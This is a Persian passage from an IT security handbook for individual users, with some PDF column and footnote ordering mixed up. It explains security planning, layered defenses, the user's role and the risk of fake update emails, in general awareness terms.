ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﻪ ﺷﺪﺕ ﻣﺤـﺪﻭﺩ ﻭ ﺑـﺴﻴﺎﺭﻱ
ﺍﻭﻗﺎﺕ ﭘﺮﻫﺰﻳﻨﻪ ﻭ ﮔﺮﺍﻧﻘﻴﻤﺖ ﺍﺳﺖ ﻭ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧـﺖ
Patches
Bandwidth
7
8
ﺑﺨﺶ ﺩﻭﻡ
ﺳﺆﺍﻻﺕ ﻣﻄﺮﺡ ﺷﺪﻩ ﺳﺆﺍﻻﺕ ﺑﺴﻴﺎﺭ ﻣﻬﻤﻲ ﻫﺴﺘﻨﺪ؛ ﭼﺮﺍﻛﻪ ﺷﻤﺎ
ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺎﺯ ﺑﻪ ﺗﺨﻤﻴﻦ ﻣﻨﺎﺳﺒﻲ ﺍﺯ ﻫﺰﻳﻨﻪ
ﻭ ﺯﻣﺎﻥ ﻻﺯﻡ ﻭ ﻧﻴﺰ ﻣﺸﻜﻼﺕ ﺟـﺎﻧﺒﻲ ﺁﻥ ﺩﺍﺭﻳـﺪ .ﺑـﺪﻭﻥ ﻭﺟـﻮﺩ
ﭼﻨﻴﻦ ﺍﻃﻼﻋﺎﺗﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﻃﻮﻝ ﻓﺮﺁﻳﻨـﺪ ﺩﭼـﺎﺭ ﻧﺎﺍﻣﻴـﺪﻱ
ﺷﻮﻳﺪ؛ ﻳﺎ ﭘﺮﻭﮊﺓ ﻣﺮﺑﻮﻃﻪ ﺭﺍ ﻟﻐﻮ ﻧﻤـﻮﺩﻩ ﻭ ﺳـﭙﺲ ﺧـﻮﺩ ﺭﺍ ﺑـﺪﻭﻥ
ﭘﺸﺘﻴﺒﺎﻥ ﺑﻴﺎﺑﻴﺪ .ﺩﺭ ﺍﺩﺍﻣـﻪ ﺩﺭ ﻣـﻮﺭﺩ ﻫﺮﻳـﻚ ﺍﺯ ﻣـﻮﺍﺭﺩ ﺗﻮﺿـﻴﺢ
ﺑﻴﺸﺘﺮﻱ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ.
ﻓﺮﺳﺘﺎﺩﻩ ﺑﺎﺷﺪ ،ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ ﺑـﺎﺯﻛﺮﺩﻥ ﻭ ﻳـﺎ ﺑـﺎﺯ ﻧﻜـﺮﺩﻥ ﺁﻥ
ﺗﺼﻤﻴﻢ ﮔﻴﺮﻱ ﻛﻨﻴﺪ .ﺍﻳﻦ ﻣﻴﺰﺍﻥ ﺍﺣﺘﻴﺎﻁ ﺩﺭ ﺯﻧﺪﮔﻲ ﺭﻭﺯﻣـﺮﻩ ﻧﻴـﺰ
ﺿﺮﻭﺭﻱ ﺍﺳﺖ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺴﻴﺎﺭ ﺧﻮﺷـﺎﻳﻨﺪ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﺍﮔـﺮ
ﺑﺘﻮﺍﻧﻴﺪ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺍﺯ ﺧﻴﺎﺑﺎﻥ ﻋﺒـﻮﺭ ﻛﻨﻴـﺪ؛ ﺍﻣـﺎ ﻻﺯﻡ
ﺍﺳﺖ ﺑﺮﺍﻱ ﻋﺒﻮﺭ ﺍﺯ ﺧﻴﺎﺑﺎﻥ ﻣﺮﺍﻗﺐ ﺁﻣﺪ ﻭ ﺭﻓﺖ ﻣﺎﺷﻴﻨﻬﺎ ﺑﺎﺷﻴﺪ.
٥٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﺯ ﻃﺮﻳﻖ ﺗﻠﻔﻦ ﺑﺮﺍﻱ ﺑﺎﺯﻩﻫﺎﻱ ﻃﻮﻻﻧﻲﻣﺪﺕ ﻫﻢ ﻣﻘـﺮﻭﻥ
ﺑﻪ ﺻﺮﻓﻪ ﻧﻴﺴﺖ .ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺭ ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ ﺑﻬﺘﺮ
ﺍﺳﺖ ﻳﻜﻨﻔﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻌﻤﻮﻝ ﺭﺍ ﺑﻪﺭﻭﺯ ﺭﺳﺎﻧﻲ ﻛـﺮﺩﻩ
ﻭ ﻧــﺴﺨﻪﻫــﺎﻱ downloadﺷــﺪﺓ ﺁﻧﻬــﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴــﺎﺭ
ﻻ
ﺩﻳﮕــﺮﺍﻥ ﻗــﺮﺍﺭ ﺩﻫــﺪ .ﻣﺘﺄﺳــﻔﺎﻧﻪ ﺍﻧﺠــﺎﻡ ﺍﻳﻨﻜــﺎﺭ ﻣﻌﻤــﻮ ﹰ
ﻣﺸﻜﻠﺘﺮ ﺍﺯ downloadﻛـﺮﺩﻥ ﻣـﺴﺘﻘﻴﻢ ﺗﻮﺳـﻂ ﻫـﺮ
ﻛﺎﺭﺑﺮ ﺍﺳﺖ؛
•
ﻫﺸﺪﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺍﻓﺮﺍﺩ ﺣﺮﻓﻪ ﺍﻱ ﺩﺭ ﻛـﺎﺭ ﺑـﺎ ﺭﺍﻳﺎﻧـﻪ
ﻻ ﻧﺴﺒﺖ ﺑﻪ ﭼﻨـﻴﻦ
ﻛﻤﻚ ﻣﻲﻛﻨﺪ .ﻛﺎﺭﺑﺮﺍﻥ ﻣﺒﺘﺪﻱ ﻣﻌﻤﻮ ﹰ
ﻫﺸﺪﺍﺭﻫﺎﻳﻲ ﺣﺴﺎﺳﻴﺖ ﺯﻳﺎﺩﻱ ﻧﺪﺍﺭﻧﺪ ﻭ ﺍﮔﺮ ﻳـﻚ ﻛـﺎﺭﺑﺮ
ﻻ ﻗﺎﺩﺭ ﺑﻪ ﻓﻬﻢ ﻛﺎﻣـﻞ ﺁﻥ ﻭ
ﻫﺸﺪﺍﺭﻱ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﻣﻌﻤﻮ ﹰ
٩
ﻣﺘﻌﺎﻗﺒﹰﺎ ﺑﺮﻭﺯ ﻭﺍﻛﻨﺶ ﻣﻨﺎﺳﺐ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ .ﺑﻌﻀﻲ ﺍﻭﻗﺎﺕ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﻣـﺸﻜﻞﺁﻓـﺮﻳﻦ ﺩﺭﻳﺎﻓـﺖ
ﻛﻨﻴﺪ ﻛﻪ ﺍﺩﻋﺎ ﺩﺍﺭﺩ ﻳﻚ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺍﺯ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ
ﻣﻲﺑﺎﺷﺪ ﻛﻪ ﺷﺎﻣﻞ ﺿﻤﻴﻤﺔ " "Updateﺍﺳﺖ ﻭﻟﻲ ﺑﺎﻳـﺪ
ﻻ ﺿﻤﻴﻤﻪﻫﺎﻱ ﺍﻳﻦ ﻧﺎﻣـﻪﻫـﺎ
ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﭼﻴﺰﻱ ﺟﺰ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺧﻄﺮﻧﺎﻙ ﻧﻴﺴﺘﻨﺪ؛ ﻭ
•
ﺩﺭ ﻣﺤﻴﻄﻬﺎﻳﻲ ﻛﻪ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺭﺍﻳﺎﻧﻪ ﻳﺎﻓـﺖ ﻣـﻲﺷـﻮﻧﺪ
)ﻣﺮﺍﻛــﺰ ﻛــﺎﺭﻱ ،ﻣــﺪﺍﺭﺱ ،ﺍﺩﺍﺭﻩﻫــﺎﻱ ﺩﻭﻟﺘــﻲ( ﻻﺯﻡ ﺍﺳــﺖ ﻛــﻪ
ﺷﺨﺼﻲ ﺑﻌﻨﻮﺍﻥ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ١٠ﺟﻬﺖ ﺍﻋﻤﺎﻝ ﺑﺮﺧـﻲ ﺍﺯ
ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺷﻮﺩ.
ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﻛﺎﺭﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﺑﻪ ﺩﻳﮕـﺮﺍﻥ
ﻧﻴﺰ ﻭﺍﮔﺬﺍﺭ ﻛﻨﻴﺪ ﺑﺎﻳـﺪ ﺍﺯ ﻳـﻚ ﻃـﺮﺡ ﺗﻌﺎﻣـﻞ ﻣﻨﺎﺳـﺐ ﺍﺳـﺘﻔﺎﺩﻩ
ﻧﻤﺎﻳﻴﺪ .ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﺩﺍﺭﺓ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺭ ﺑﺨـﺸﻬﺎﻱ
ﺩﻳﮕﺮ ﻛﺘﺎﺏ ﺍﺭﺍﺋﻪ ﺧﻮﺍﻫﺪ ﺷﺪ .ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﻣـﺸﺨﺺ
ﻛﺮﺩﻥ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺩﺭ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺗﺤﺖ ﮔﺮﻭﻫﻬﺎﻱ ﻳﻚ ﻳﺎ
ﭼﻨﺪ ﻧﻔﺮﻩ ﺑﺨﺶ ﻣﻬﻤﻲ ﺍﺯ ﻫﺮ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ.
ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﻓﺮﺩﻱ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺑﺴﻴﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ
ﻣﻲﭘﺮﺩﺍﺯﻧﺪ .ﺍﻛﻨﻮﻥ ﻛﻪ ﺷﻤﺎ ﻣﻔﻬﻮﻡ ﺧﻄﺮﺍﺕ ﺭﺍ ﺩﺭﻙ ﻛـﺮﺩﻩ ﻭ ﺩﺭ
ﺭﺍﺑﻄﻪ ﺑﺎ ﺍﻧﻮﺍﻉ ﺧﻄﺮﺍﺗﻲ ﻛﻪ ﺑﺎﻳﺪ ﻛﺎﻫﺶ ﻳﺎﻓﺘﻪ ﻭ ﻳﺎ ﺍﺯ ﺑﻴﻦ ﺑﺮﻭﻧـﺪ
ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﻛﺮﺩﻩﺍﻳﺪ ،ﻗﺎﺩﺭ ﻫﺴﺘﻴﺪ ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﻓـﺮﺩﻱ ﺭﺍ
ﺑــﻪ ﺍﺟــﺮﺍ ﺩﺭ ﺁﻭﺭﻳــﺪ .ﭘــﺲ ﺍﺯ ﺍﺭﺯﻳــﺎﺑﻲ ﻗﻴﻤﺘﻬــﺎ ،ﺯﻣــﺎﻥ ﻻﺯﻡ ﻭ
۹
ﻫﺮﭼﻨﺪ ﺑﺎ ﮔﺴﺘﺮﺵ ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘـﻲ ﺟﺎﻣﻌـﻪ ،ﺍﻳـﻦ ﻭﺿـﻊ ﺩﭼـﺎﺭ ﺗﻐﻴﻴـﺮ
ﻣﻲﺷﻮﺩ.
System Administrator
10
ﺩﺭﺩﺳﺮﻫﺎﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠـﻪ ﺑﺮﺳـﻴﺪ ﻛـﻪ
ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺑﻌﻀﻲ ﺍﺯ ﺧﻄﺮﺍﺕ ﺣـﺪﺍﻗﻞ ﺩﺭ ﺯﻣـﺎﻥ ﺣﺎﺿـﺮ ﺿـﺮﻭﺭﻱ
ﻧﻴﺴﺖ .ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺧﺎﺻﻲ ﺗﻜﻴﻪ
ﻣﻲﻛﻨﺪ ﺍﻣـﺎ ﻛﻤﺎﻛـﺎﻥ ﺑﺎﻳـﺪ ﻓﺮﺁﻳﻨـﺪ ﻫـﺎ ،ﻗـﻮﺍﻧﻴﻦ ،ﻭ ﻣﻼﺣﻈـﺎﺕ
ﺷﺨﺼﻲ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ.
ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺎﺳﺐ ﺍﺯ ﻻﻳﻪﻫﺎﻱ ﭼﻨﺪﮔﺎﻧﻪ ﺗﺸﻜﻴﻞ ﺷـﺪﻩ ﻭ
ﻫﺮ ﻻﻳﻪ ﺍﻧﻮﺍﻉ ﺧﺎﺻﻲ ﺍﺯ ﺧﻄﺮﺍﺕ ﺭﺍ ﺍﺯ ﺑﻴﻦ ﻣﻲﺑـﺮﺩ .ﭼﻨﺎﻧﭽـﻪ ﺍﺯ
ﻻﻳــﻪﻫــﺎﻱ ﻣﺨﺘﻠــﻒ ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻴــﺪ ﻣــﺴﻠﻤﹰﺎ ﺩﺭ ﭘﻴــﺸﮕﻴﺮﻱ ﺍﺯ
ﻣﺸﻜﻼﺕ ﺑﻴﺸﺘﺮﻱ ﻣﻮﻓﻖ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ .ﻋﻤﻞ ﺭﺍﻧﻨﺪﮔﻲ ﺭﺍ ﺩﺭﻧﻈـﺮ
ﺑﻴﺎﻭﺭﻳﺪ .ﺑﻨﻈﺮ ﺷﻤﺎ ﭼﻪ ﺗﺪﺍﺑﻴﺮﻱ ﻣﻲﺗﻮﺍﻥ ﺍﻧﺪﻳـﺸﻴﺪ ﻛـﻪ ﺍﺣﺘﻤـﺎﻝ
ﻭﻗﻮﻉ ﺗﺼﺎﺩﻑ ﻛﺎﻫﺶ ﻳﺎﺑﺪ؟
ﺑﻌﻀﻲ ﺍﺯ ﻣﻼﺣﻈﺎﺕ ﻣﻨﺎﺳﺐ ﺩﺭ ﺯﻳﺮ ﺁﻣﺪﻩﺍﻧﺪ:
•
ﭼﻨﺎﻧﭽﻪ ﻣﺎﺷﻴﻦ ﻧﻴﺎﺯ ﺑﻪ ﺗﻌﻤﻴﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺑﻪ ﺩﺭﺳﺘﻲ
ﺗﻌﻤﻴﺮ ﺷﻮﺩ.
•
ﺭﺍﻧﻨﺪﮔﻲ ﺑﺎﻳﺪ ﺑﺎ ﺩﻗﺖ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ.
•
ﭼﻨﺎﻧﭽﻪ ﻛﺎﺭﺧﺎﻧـﻪ ﻧـﺴﺒﺖ ﺑـﻪ ﻭﺟـﻮﺩ ﻋﻴﺒـﻲ ﺩﺭ ﻣﺎﺷـﻴﻦ
ﻫﺸﺪﺍﺭ ﺩﻫﺪ ﻛﻪ ﺑﺎ ﺳﻼﻣﺖ ﺍﻓﺮﺍﺩ ﻣﺮﺗﺒﻂ ﺑﺎﺷﺪ ،ﺁﻥ ﻋﻴـﺐ
ﺑﺎﻳﺪ ﺳﺮﻳﻌﹰﺎ ﺭﻓﻊ ﮔﺮﺩﺩ.
•
ﻫﻨﮕﺎﻡ ﺭﺍﻧﻨﺪﮔﻲ ﺑﺎﻳﺪ ﺍﺣﺘﻴﺎﻁ ﻛﺮﺩ ،ﭼﺮﺍﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﻣﺎﺷﻴﻨﻬﺎﻱ ﺩﻳﮕﺮ ﺑﺮﺍﻳﺘﺎﻥ ﻣﺸﻜﻞ ﺑﻴﺎﻓﺮﻳﻨﻨﺪ.
•
ﺍﮔﺮ ﺩﺭ ﺭﻭﺯﻧﺎﻣﻪ ﻫﺸﺪﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩ ﻛﻪ ﭘﻠﻲ ﺷﻜﺴﺘﻪ ﺍﺳﺖ،
ﺑﺎﻳﺪ ﺍﺯ ﺭﺍﻧﻨﺪﮔﻲ ﺑﺮ ﺭﻭﻱ ﺁﻥ ﭘﺮﻫﻴﺰ ﺷﻮﺩ.
ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﻋﻮﺍﻣﻞ ﺑﺎﻻ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻗﺎﺩﺭ ﺑـﻪ ﺗـﻀﻤﻴﻦ ﺳـﻼﻣﺖ
ﺷﻤﺎ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ ،ﻭﻟﻲ ﺑﺎ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻫﻤـﺔ ﺁﻧﻬـﺎ ﻣـﻲﺗـﻮﺍﻥ
ﺍﺣﺘﻤﺎﻝ ﺑﺮﻭﺯ ﺗﺼﺎﺩﻑ ﺭﺍ ﺗﺎ ﺣـﺪ ﻗﺎﺑـﻞ ﺗـﻮﺟﻬﻲ ﻛـﺎﻫﺶ ﺩﺍﺩ .ﺩﺭ
ﺗﺪﻭﻳﻦ ﺍﺟﺰﺍﻱ ﻳـﻚ ﻃـﺮﺡ ﺍﻣﻨﻴﺘـﻲ ،ﺍﻓـﺮﺍﺩ ﺑﺎﻳـﺪ ﻻﻳـﻪﻫـﺎﻳﻲ ﺍﺯ
ﺣﻔﺎﻇﺖ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻧـﺪ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺣﺘـﻲ ﺗـﺎ ﺣـﺪﻭﺩﻱ
ﺗﻜﺮﺍﺭﻱ ﺑﺎﺷﻨﺪ .ﺑﺮﺍﻱ ﺩﺭﻙ ﺑﻬﺘﺮ ﺗﺼﻮﺭ ﻛﻨﻴﺪ ﻛﻪ ﻣـﻲﺧﻮﺍﻫﻴـﺪ ﺍﺯ
ﻳﻚ ﺗﻜﻪ ﺟﻮﺍﻫﺮ ﻗﻴﻤﺘﻲ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴـﺪ .ﻣـﺴﻠﻤﹰﺎ ﺁﻧـﺮﺍ ﺩﺭ ﻳـﻚ
ﺟﻌﺒﺔ ﺳﺮﺑﺴﺘﻪ ﻭ ﺳﭙﺲ ﺩﺭ ﻳﻚ ﺍﺗﺎﻕ ﻗﻔﻞﺷﺪﻩ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴـﺪ؛ ﻭ
ﺟﻬﺖ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻴﺸﺘﺮ ،ﺁﻧـﺮﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺳـﺮﻗﺖ ﻧﻴـﺰ ﺑﻴﻤـﻪ
ﺧﻮﺍﻫﻴﺪ ﻧﻤﻮﺩ .ﺩﺭ ﺍﻳﻦ ﻣﺜﺎﻝ ﻋﻤﻞ ﻣﺤﺎﻓﻈﺖ ﺩﺭ ﭼﻨـﺪﻳﻦ ﻣﺮﺣﻠـﻪ
ﺍﻧﺠﺎﻡ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﻣﺮﺍﺣﻞ ﺑـﻪ ﺗﻨﻬـﺎﻳﻲ ﺿـﺮﻳﺐ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺟﻮﺍﻫﺮ ﺭﺍ ﻛﻤﻲ ﺑﺎﻻ ﻣﻲﺑﺮﻧﺪ ،ﻭﻟﻲ ﻣﺴﻠﻤﹰﺎ ﺑﻜـﺎﺭﮔﻴﺮﻱ
ﺗﻤﺎﻡ ﻣﺮﺍﺣﻞ ﻋﺎﻗﻼﻧﻪﺗﺮ ﺍﺳﺖ ،ﭼﺮﺍﻛـﻪ ﺍﮔـﺮ ﺩﺭ ﻳـﻚ ﻣﺮﺣﻠـﻪ ﺑـﺎ
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
٥٣
ﺷﻜﺴﺖ ﻣﻮﺍﺟﻪ ﺷﻮﻳﺪ ﻣﺮﺍﺣﻞ ﺩﻳﮕﺮ ﺩﺭ ﺭﺳﻴﺪﻥ ﺷﻤﺎ ﺑﻪ ﻣﻮﻓﻘﻴﺖ
ﻼ ﺍﮔﺮ ﺷﺨﺼﻲ ﻏﻴﺮﻗﺎﺑﻞ ﺍﻋﺘﻤـﺎﺩ ﺩﺭ ﺧﺎﻧـﻪ ﺑﺎﺷـﺪ،
ﻛﻤﻚ ﺧﻮﺍﻫﺪ ﻛﺮﺩ )ﻣﺜ ﹰ
ﻣﺴﻠﻤﹰﺎ ﻗﻔﻞ ﻛﺮﺩﻥ ﺩﺭ ،ﺭﺍﻩ ﻣﻨﺎﺳﺒﻲ ﻧﻴﺴﺖ(.
ﻧﻘﺶ ﻛﺎﺭﺑﺮ ﺩﺭ ﺍﻣﻨﻴﺖ
ﺍﻭﻟﻴﻦ ﻛﺎﺭﺑﺮ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨـﺪ ﻧﻘـﺶ ﻣﻬﻤـﻲ ﺩﺭ
ﺗــﻀﻤﻴﻦ ﺍﻳﻤﻨــﻲ ﺭﺍﻳﺎﻧــﻪ ﻭ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﺁﻥ ﺩﺍﺭﺩ .ﺩﺭﻣﺠﻤــﻮﻉ
ﻛﺎﺭﺑﺮﺍﻥ ﺩﻳﮕﺮ ﻧﻴـﺰ ﺩﺭ ﺗـﻀﻤﻴﻦ ﺩﻗـﺖ ﺩﺭ ﻋﻤﻠﻴـﺎﺕ ﺣﻔﺎﻇـﺖ ﻭ
ﺍﻳﻤﻨﻲ ﻧﻘﺶ ﺑﺴﺰﺍﻳﻲ ﺩﺍﺭﻧﺪ .ﺩﻗﺖ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﺎﺭﺑﺮﺍﻧﻲ ﻛـﻪ
ﻧﺴﺒﺖ ﺑﻪ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﻧﺪﺍﺭﻧﺪ ﺧﻮﺩ ﺍﺯ ﺑﺰﺭﮔﺘﺮﻳﻦ
ﺧﻄﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﻧﺪ.
ﺍﻣﻨﻴﺖ ﻳﻚ ﻫﻨﺮ ﺍﺳﺖ ،ﻧﻪ ﻳﻚ ﻋﻠﻢ
ﺩﺭ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﻫﻴﭻ ﺗﻀﻤﻴﻦ ﺻـﺪ ﺩﺭﺻـﺪﻱ
ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ،ﭼﺮﺍﻛﻪ ﻫﻤﻴﺸﻪ ﻧﻘﺎﻳﺺ ﺗﺎﺯﻩ ﻭ ﺭﺍﻫﻬﺎﻱ ﺟﺪﻳﺪ ﻧﻔـﻮﺫ
ﻭ ﻓﺮﺻـﺘﻬﺎﻱ ﻧـﻮ ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ ﻣـﺸﻜﻞ -ﻛـﻪ ﺧـﻮﺩ ﻧﺎﺷــﻲ ﺍﺯ
ﺧﻄﺎﻫﺎﻱ ﺍﻧﺴﺎﻧﻲ ﺍﺳﺖ -ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺍﻣﺎ ﺍﮔـﺮ ﻣﻄﺎﻟﻌـﺔ
ﺩﻗﻴﻘﻲ ﺍﻧﺠﺎﻡ ﺑﮕﻴﺮﺩ ﻭ ﺍﺯ ﺗﺠﺎﺭﺏ ﻣﻮﻓﻖ ﺍﻣﻨﻴﺘﻲ ١٢ﺍﺳـﺘﻔﺎﺩﻩ ﺷـﻮﺩ
ﻣــﻲﺗــﻮﺍﻥ ﺩﺭ ﻋﻤﻠﻜــﺮﺩ ﺳﻴــﺴﺘﻢ ﺍﻣﻨﻴــﺖ ﻻﺯﻡ ﺭﺍ ﺑﻮﺟــﻮﺩ ﺁﻭﺭﺩ.
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻭ ﮔﺮﻭﻫﻬـﺎﻱ ﭘـﺴﺘﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ
ﺭﺍﻳﺎﻧﻪ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻛﻤﻜﻬـﺎﻱ ﺷـﺎﻳﺎﻧﻲ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﺑﺎﺷـﻨﺪ،
ﭼﺮﺍﻛــﻪ ﻣــﻲﺗــﻮﺍﻥ ﺩﺭ ﺷــﺮﺍﻳﻂ ﻏﻴــﺮ ﻣﻌﻤــﻮﻝ ﻭ ﺑــﺮﻭﺯ ﻭﺿــﻌﻴﺖ
ﻏﻴﺮﻋﺎﺩﻱ ﺍﺯ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻱ ﺁﻧﻬﺎ ﺑﻬﺮﻩ ﮔﺮﻓﺖ.
Encryption
Security Best Practices
11
12
ﺑﺨﺶ ﺩﻭﻡ
ﻧﻜﺘﺔ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﻌﻀﻲ ﻣﻮﺍﻗﻊ ﺍﺣﺘﻤﺎﻝ ﺩﺍﺭﺩ ﻓﻨـﻮﻥ
ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺑﺎ ﺷﻜﺴﺖ ﻣﻮﺍﺟﻪ ﺷﻮﻧﺪ .ﺍﻳﻦ ﺍﻣﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺎﺷﻲ
ﺍﺯ ﻣﺸﻜﻼﺕ ﻃﺮﺍﺣﻲ ،ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺿﻌﻴﻒ ﻭ ﻳﺎ ﺧﻄﺎﻫﺎﻱ ﺍﻧـﺴﺎﻧﻲ
ﺑﺎﺷﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻣﻮﺭﺩ ﻣـﺸﻜﻼﺕ ﺍﺑﺰﺍﺭﻫـﺎﻳﻲ ﻣﺜـﻞ
ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ ،ﺭﻣﺰﮔﺬﺍﺭﻱ ١١ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺻﺪﻕ ﻛﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ
ﭼﻮﻥ ﺍﻣﻜﺎﻥ ﺷﻜﺴﺖ ﺑﺮﺍﻱ ﻫﺮﻛـﺪﺍﻡ ﺍﺯ ﺍﺑﺰﺍﺭﻫـﺎ ﺩﺭ ﻫـﺮ ﺯﻣـﺎﻧﻲ
ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻧﺒﺎﻳﺪ ﺗﻨﻬﺎ ﺑﺮ ﻳﻚ ﺷﻴﻮﻩ ﺗﻜﻴﻪ ﻧﻤﻮﺩ.
٥٥
